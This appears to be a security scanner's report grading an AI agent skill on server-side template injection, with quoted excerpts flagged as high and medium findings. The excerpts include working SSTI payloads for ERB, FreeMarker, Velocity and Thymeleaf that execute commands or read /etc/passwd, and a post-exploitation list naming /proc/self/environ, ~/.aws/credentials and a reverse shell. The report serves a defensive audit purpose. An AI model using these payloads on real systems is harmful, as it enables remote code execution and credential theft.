ssti-server-side-template-injection

https://raw.githubusercontent.com/yaklang/hack-skills/main/skills/ssti-server-side-template-injection/SKILL.md

github.com/yaklang/hack-skills

Scanned Thu, 28 May 2026 17:27:37 GMT

Scan ID crawl-uaeqbgwr2wdsr8wje7yir2a7 · 1ms

SCORE 55 / 100

Verdict: Proceed with caution

4 high-severity findings.

This skill reads protected filesystem locations plus 12 other issues listed below.

0 critical4 high9 medium-1 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 4 high-severity findings (3+ HIGHs → C).

0 CRIT4 HIGH9 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 2 of 4 HIGH (cap is 2) + 4 of 9 MED (cap is 5).
A
Reach Atarget score 95
Resolve all 4 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 224CWE-552

▾

222<%= `id` %>

223<%= IO.popen('id').read %>

224<%= File.read('/etc/passwd') %>← sensitive path — credential-exfiltration vector

225```

226

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 276CWE-552

▾

274

275**Post-RCE pivot**:

2761. Read `/proc/self/environ` — env vars with credentials← sensitive path — credential-exfiltration vector

2772. Read application config files — DB passwords, API keys

2783. `cat ~/.aws/credentials` — cloud credentials

high

Sensitive filesystem path referenced

The skill references a path (`~\/\.aws\/`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 278CWE-552

▾

2761. Read `/proc/self/environ` — env vars with credentials

2772. Read application config files — DB passwords, API keys

2783. `cat ~/.aws/credentials` — cloud credentials← sensitive path — credential-exfiltration vector

2794. Reverse shell for persistence

280

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 337CWE-552

▾

335When Flask **debug mode** (Werkzeug debugger) is exposed but **PIN-protected**, the PIN is derived from host-specific values. Typical inputs for public PIN calculation scripts:

336

3371. **`username`** — from `/etc/passwd` (the user running the Flask process)← sensitive path — credential-exfiltration vector

3382. **Module name** — often `flask.app` or `Flask`

3393. **Application path** — `app.py` or the real main filename

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 103CWE-78

▾

101{{''.__class__.__mro__[1].__subclasses__()}}

102

103# Find subprocess.Popen index (usually around 258-270, varies by Python version):← spawns a subprocess outside declared capabilities

104# Look for "subprocess.Popen" in the list

105

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 104CWE-78

▾

102

103# Find subprocess.Popen index (usually around 258-270, varies by Python version):

104# Look for "subprocess.Popen" in the list← spawns a subprocess outside declared capabilities

105

106# Execute command (replace [258] with correct index):

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 179CWE-78

▾

177```freemarker

178<#assign ob="freemarker.template.utility.ObjectConstructor"?new()>

179<#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.Runtime")?api.exec("id").inputStream))>← spawns a subprocess outside declared capabilities

180${br.readLine()}

181```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 205CWE-78

▾

203```velocity

204#set($str=$class.inspect("java.lang.Runtime").method.invoke($class.inspect("java.lang.Runtime").type, null))

205#set($run=$str.exec("id"))← spawns a subprocess outside declared capabilities

206#set($out=$run.inputStream)

207```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 234CWE-78

▾

232```java

233// In th:text or th:fragment context:

234__${T(java.lang.Runtime).getRuntime().exec("id")}__::type← spawns a subprocess outside declared capabilities

235

236// Fragment expression context:

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 237CWE-78

▾

235

236// Fragment expression context:

237__${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c","id"}).getInputStream())}__::type← spawns a subprocess outside declared capabilities

238```

239

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 269CWE-78

▾

267├── FreeMarker → freemarker.template.utility.Execute?new()

268├── Twig → _self.env.registerUndefinedFilterCallback('exec')

269├── Velocity → java.lang.Runtime.exec()← spawns a subprocess outside declared capabilities

270├── ERB → <%= `cmd` %>

271├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 271CWE-78

▾

269├── Velocity → java.lang.Runtime.exec()

270├── ERB → <%= `cmd` %>

271├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()← spawns a subprocess outside declared capabilities

272└── Angular CSTI → constructor.constructor('payload')()

273```

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

Scan another →Share

skillox.io/r/crawl-uaeqbgwr2wdsr8wje7yir2a7